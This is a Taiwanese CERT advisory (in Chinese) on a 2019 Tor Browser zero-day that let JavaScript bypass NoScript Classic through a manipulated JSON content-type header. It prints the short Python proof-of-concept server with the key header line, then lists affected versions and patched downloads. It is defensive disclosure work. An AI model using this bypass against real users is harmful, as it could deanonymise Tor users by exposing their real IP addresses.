按 Enter 到主內容區
:::

TWCERT-電子報

:::

Tor火速升級瀏覽器,敉平0-Day漏洞:Bypass NoScript套件

發布日期:
字型大小:
  • 發布單位:TWCERT/CC
  • 更新日期:2019-04-03
  • 點閱次數:514
Tor火速升級瀏覽器,敉平0-Day漏洞:Bypass NoScript套件

內文

●概述:
Tor源於洋蔥路由器(The Onion Router)縮寫,1990年代中期由美國海軍研究機構開發,以保護情報通訊,核心技術「洋蔥路由」如同洋蔥一般,層層加密保護,隱藏用戶真實IP,避免網路監控及流量分析的追蹤手段,實踐匿名通訊自由,而Tor Browser係由Mozilla Firefox ESR修改而成,此開源瀏覽器支援Windows、Mac OS X、Linux、Unix、BSD、Android等平台,特色是中斷連網後,自動刪除cookie、歷史記錄等敏感資料,近日甫經Zerodium披露其0-Day探勘技術,可針對Tor瀏覽器運用之NoScript擴充插件發動攻擊,蓄意變更content-type表頭成為JSON格式,斲喪XSS反制能力,令惡意JavaScript突破NoScript白名單限制,此嚴重缺失未及註冊CVE編號,然The Tor Project Inc已修補並推出新版Tor Browser,而NoScript Classic亦改良完畢。
●編註:
(1)NoScript迴避弱點事件
(1-1)漏洞分析
本次Tor瀏覽器安全機制迴避方式,係某個入侵技術供應方Zerodium,在tweet發表週知,鑒於Tor素來以資訊隱密而聞名,阻礙網站探知瀏覽器使用者個別資料,匿名效果歸功於綁定於瀏覽器的NoScript擴充插件軟體,故Zerodium從NoScript下手,藉著變更content-type表頭成為JSON格式,繞過NoScript Classic最高安全等級攔截機制,可執行惡意JavaScript,刺探Tor browser用戶真實IP等隱私訊息。
(1-2)探勘實務
#!/usr/bin/python
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
PORT_NUMBER = 31337
class myHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-type','text/html;/json') #關鍵行
self.end_headers()
self.wfile.write("Tor Browser 7.x PoC")
return
try:
server = HTTPServer(('', PORT_NUMBER), myHandler)
print 'Started httpserver on port ' , PORT_NUMBER
server.serve_forever()
except KeyboardInterrupt:
print '^C received, shutting down the web server'
server.socket.close()
上段python內,函數myHandler( )用來處理GET request,十幾行程式語言中,最重要的是關鍵行,執行header格式異動,設定為JSON類型,生效後HTTPServer並通過port 31337傳輸封包,其流量均不受NoScript過濾。
(2)略述NoScript
原先NoScript為 Mozilla Firefox所開發的擴充功能(Add-ons),也是免費開源,其預設行為是阻止不在白名單中的指令碼,造大量依賴JavaScript網頁面無法正常顯示,自然增加用戶操作麻煩,但NoScript也支援黑名單模式,禁止非信任站台。
NoScript白名單藉由停用JavaScript、Flash、Silverlight、Java與某些特殊的控制碼或外掛程式,故能有效反制XSS,一旦某頁面試圖將HTML、JavaScript代碼插入另外頁面,NoScript就會過濾掉有害請求,避免惡意設計繞過Tor而取得真實IP與相關資訊。

影響產品

Tor Browser 7.5.6以前版本 /NoScript Classic 5.1.8.6以前版本

解決辦法

(1)取得NoScript Classic 5.1.8.7,參考https://secure.informaction.com/download/releases/noscript-5.1.8.7.xpi。
(2)下載Tor Browser 8.0穩定版,參考https://www.torproject.org/projects/torbrowser.html.en#downloads,選擇所需語系及適用平台。
回頁首